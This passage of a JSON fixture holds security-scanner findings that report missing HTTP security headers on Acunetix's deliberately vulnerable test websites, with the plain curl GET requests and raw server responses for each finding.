HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:46 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 351, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:40:53.800Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 352, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:40:54.034Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 353, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:40:54.214Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 354, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:40:54.395Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 355, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:40:54.564Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 356, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:40:54.696Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 357, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:40:54.830Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 358, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:40:54.977Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 359, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:40:55.160Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 360, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:40:55.293Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 361, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:40:55.420Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 362, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:40:55.560Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 